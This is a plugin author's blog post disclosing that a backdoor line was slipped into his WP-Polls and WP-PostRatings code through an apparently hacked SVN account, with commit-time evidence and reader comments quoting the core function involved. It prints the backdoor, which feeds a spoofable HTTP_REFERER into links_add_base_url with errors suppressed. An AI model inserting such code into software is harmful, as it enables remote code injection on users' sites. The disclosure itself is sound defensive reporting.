I have release 2 security updates to WP-Polls and WP-PostRatings which basically removes a malicious code that allows code injection.
The malicious code is as follows:
if ($_SERVER['PHP_SELF'] == @links_add_base_url("/", $_SERVER['HTTP_REFERER']))
return;
The code itself does nothing, but hackers are spoofing the $_SERVER['HTTP_REFERER'] that allows arbitrary code injection and note the @ sign which surpress all errors and hence the error will not be displayed.
I am 100% sure based on the points below that the code was not added by me. I am beginning to believe that my account was hacked.
- Personally, I have no idea what
links_add_base_url()does and hence it is impossible for me to place it in my own plugin code. - I checked the commit date for the changeset of WP-PostRatings and the date/time is 11/04/10 22:10:13. Since I am on the GMT+8 zone, it is 6am for me. I do not wake up at 6am just to update my plugin.
- The above changeset is for trunk. However in my readme.txt, I have state that the stable tag is 1.50 and hence the file is copied to /tags/1.50/ in this changeset, but if you note the time, it is 11/05/10 00:52:39. This is almost 3 hours after the trunk commit and it is almost 9am on my timezone and I will be in my office and my office’s computer does not have SVN copies of my plugin. So it is also not possible for me to commit that file
- If you notice the same changeset, the file is being copied from trunk to tags/1.50 by SVN copy. I do not do a SVN copy for my plugins, normally I will just copy and paste the files using my Windows Explorer.
- For WP-Polls, there is only 1 changeset as my stable tag is from trunk and the timestamp is 11/05/10 12:30:07. This is about 12 hours after the changeset of WP-PostRatings. On my timezone it is about 8.30pm and it is not possible for me to check-in because 8pm to 9pm is my dinner time and I always eat out.
- For WP-WAP, there is almost 2 suspicious commit, here and here. As I do not develop WP-Wap anymore, there is no reason for me to commit something to it
I am going to review all my commits to the SVN to ensure that there are no more suspicious code being added.
(87 votes, average: 3.93 out of 5)
/**
* Add a Base url to relative links in passed content.
*
* By default it supports the 'src' and 'href' attributes. However this can be
* changed via the 3rd param.
*
* @since 2.7.0
*
* @param string $content String to search for links in.
* @param string $base The base URL to prefix to links.
* @param array $attrs The attributes which should be processed.
* @return string The processed content.
*/
function links_add_base_url( $content, $base, $attrs = array('src', 'href') ) {
$attrs = implode('|', (array)$attrs);
return preg_replace_callback("!($attrs)=(['\"])(.+?)\\2!i",
create_function('$m', 'return _links_add_base($m, "' . $base . '");'),
$content);
}
Yeap, I checked that out after that, but I have no use for it.
So how does the exploit work?